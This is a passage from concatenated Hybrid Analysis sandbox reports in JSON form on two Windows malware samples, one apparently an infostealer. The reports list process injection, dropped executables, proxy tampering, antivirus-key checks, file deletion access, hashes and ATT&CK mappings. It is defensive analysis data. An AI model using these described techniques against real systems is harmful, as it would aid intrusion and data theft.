\"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"\\Device\\KsecDD\"\n \"rundll32.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"rundll32.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"9ncalrpc:[epmapper,Security=Impersonation Dynamic False]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE3E8F792BB0AA415691BBBC906621]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"I+ncalrpc:[OLEAD3A1DC5F340491A9B407521D504]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE1E85806D10A948D3B137F17E4E64]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLEAD3A1DC5F340491A9B407521D504]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "string-63", "type": 2, "relevance": 3, "name": "Found a potential E-Mail address in binary/memory", "description": "Pattern match: \"s@online.ie\"\n Pattern match: \"hapubws@www.eol.cn\"\n Pattern match: \"hapubws@wayfair.com\"\n Pattern match: \"hapubws@same.eastmoney.com\"\n Pattern match: \"hapubws@gateway.foresee.com\"\n Pattern match: \"hapubws@jalan.net\"\n Pattern match: \"hapubws@nextag.com\"\n Pattern match: \"hapubws@www.rakuten.co.jp\"\n Pattern match: \"hapubws@bat.bing.com\"\n Pattern match: \"hapubws@accengage.net\"\n Pattern match: \"hapubws@allabout.co.jp\"\n Pattern match: \"hapubws@brothersoft.com\"\n Pattern match: \"hapubws@www.meetic.es\"\n Pattern match: \"hapubws@bidswitch.net\"\n Pattern match: \"hapubws@digitru.st\"\n Pattern match: \"hapubws@stat.eol.cn\"\n Pattern match: \"hapubws@linkedin.com\"\n Pattern match: \"hapubws@www.mynet.com\"\n Pattern match: \"hapubws@crwdcntrl.net\"\n Pattern match: \"hapubws@www.scribd.com\"\n Pattern match: \"hapubws@flipboard.com\"\n Pattern match: \"hapubws@piximedia.com\"\n Pattern match: \"hapubws@exelator.com\"\n Pattern match: \"hapubws@justanswer.com\"", "origin": "File/Memory", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "stream-106", "type": 1, "relevance": 7, "name": "Contains ability to execute program", "description": "WinExec@KERNEL32.dll at 61726-94-004086F0\n WinExec@KERNEL32.dll at 61726-108-00405290", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" claimed CRC 79767 while the actual is CRC 146715\n \"_.exe\" claimed CRC 79767 while the actual is CRC 94689\n \"rundll32.exe\" claimed CRC 79767 while the actual is CRC 134678\n \"notepad_.exe\" claimed CRC 79767 while the actual is CRC 146302", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegDeleteKeyA\n RegCloseKey\n RegDeleteValueA\n RegCreateKeyExA\n RegOpenKeyExA\n GetFileAttributesA\n GetTickCount\n GetVersionExA\n GetModuleFileNameA\n LoadLibraryA\n WinExec\n GetStartupInfoA\n OpenProcess\n CreateDirectoryA\n DeleteFileA\n ReadProcessMemory\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n GetModuleHandleA\n GetTempFileNameA\n GetSystemDirectoryA\n TerminateProcess\n Sleep\n ShellExecuteA\n FindWindowA\n GetWindowThreadProcessId\n FindWindowExA\n HttpSendRequestA\n InternetCloseHandle\n InternetOpenA\n InternetReadFile\n InternetConnectA\n HttpQueryInfoA\n socket\n recv\n send\n WSAStartup\n connect\n closesocket", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00005856]\n \"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47CBF.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\¢«.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\notepad¢¬.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\system\\rundll32.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-61", "type": 2, "relevance": 10, "name": "Found an instant messenger related domain", "description": "\"hotwire.com\" (Indicator: \"wire.com\")\n \"blackberry.com\" (Indicator: \"blackberry.com\")", "origin": "File/Memory"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-131", "type": 1, "relevance": 5, "name": "Contains ability to retrieve the fully qualified path of module", "description": "GetModuleFileNameA@KERNEL32.dll at 61726-109-00405440", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"rundll32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\IEXPLORE.EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\IEXPLORE .EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\internat.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\IEXPLORE.EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\IEXPLORE .EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\mssysint.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\mspsint.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\mspbint.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\mspbbase.dll\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\mspbhook.dll\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\psinthk.dll\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\psintbs.dll\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\¢®.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\notepad¢®.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\¢«.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\system32\\notepad¢¬.exe\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\INTERNAT.EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\System32\\IEXPLORE.EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\System32\\IEXPLORE .EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\System32\\MSSYSINT.EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\System32\\MSPSINT.EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\System32\\MSPBINT.EXE\" with delete access\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" opened \"C:\\Windows\\System32\\MSPBBASE.DLL\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"WinExec\" with parameter %WINDIR%\\system\\rundll32.exe (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" wrote 1500 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" allocated memory in \"C:\\531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-32", "type": 3, "relevance": 8, "name": "Reads Antivirus engine related registry keys", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")", "origin": "Registry Access", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-248", "type": 9, "relevance": 6, "name": "Detected Rundll32 execution with no parameters provided (likely process injection)", "description": "Process \"rundll32.exe\" with commandline \"\" [UID: 00000000-00005856]", "origin": "Monitored Target", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"rundll32.exe\" connects to <IPv4>:80", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e
https://hybrid-analysis.com/sample/22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e
Hybrid Analysis - Infostealers
{"size": 6775507, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e", "sha256": "22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e", "av_detect": 83, "vx_family": "Zusy.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 6, "total_signatures": 220, "extracted_files": [{"name": "_vslite.bat", "file_path": "%TEMP%\\_vslite.bat", "file_size": 249, "sha256": "fcc6e76215485f663ad89167661715dd6454761f55bffe05b2af623b2b831c97", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "xyzuqi.exe (PID: 4108)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "gbp.ini", "file_path": "%TEMP%\\gbp.ini", "file_size": 104, "sha256": "30f820bb1ca6c20bcd77113c7377e01f31cdf0ec5b64864f22887d41a9bf3c7a", "type_tags": ["text"], "description": "ISO-8859 text, with no line terminators", "runtime_process": "xyzuqi.exe (PID: 4108)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "golfinfo.ini", "file_path": "%TEMP%\\golfinfo.ini", "file_size": 512, "sha256": "a5772e34d56834616a1c851b3650a866b45b11d3b9d3ce743ee32e26e2cc7684", "type_tags": ["text"], "description": "Non-ISO extended-ASCII text, with very long lines (512), with no line terminators", "runtime_process": "bauqs.exe (PID: 5756)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "muniw.exe", "file_path": "%TEMP%\\muniw.exe", "file_size": 470647, "sha256": "6d826da38d2ad0f5237b82ef1659e97ba858b03d5c051565542ee5f78a53f062", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "xyzuqi.exe (PID: 4108)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005920", "name": "22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe", "normalized_path": "C:\\22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe", "sha256": "22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e"}, {"uid": "00000000-00005756", "parentuid": "00000000-00005920", "name": "bauqs.exe", "normalized_path": "%TEMP%\\bauqs.exe", "sha256": "c59a2297fb6f41107ce7533cad2326a732a629fdb68e26101068083cffd447ea"}, {"uid": "00000000-00004108", "parentuid": "00000000-00005756", "name": "xyzuqi.exe", "normalized_path": "%TEMP%\\xyzuqi.exe", "command_line": "OK", "sha256": "c59a2297fb6f41107ce7533cad2326a732a629fdb68e26101068083cffd447ea"}, {"uid": "00000000-00001844", "parentuid": "00000000-00004108", "name": "muniw.exe", "normalized_path": "%TEMP%\\muniw.exe", "sha256": "6d826da38d2ad0f5237b82ef1659e97ba858b03d5c051565542ee5f78a53f062"}, {"uid": "00000000-00000568", "parentuid": "00000000-00004108", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\_vslite.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005740", "parentuid": "00000000-00005920", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\_vslite.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 5, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": 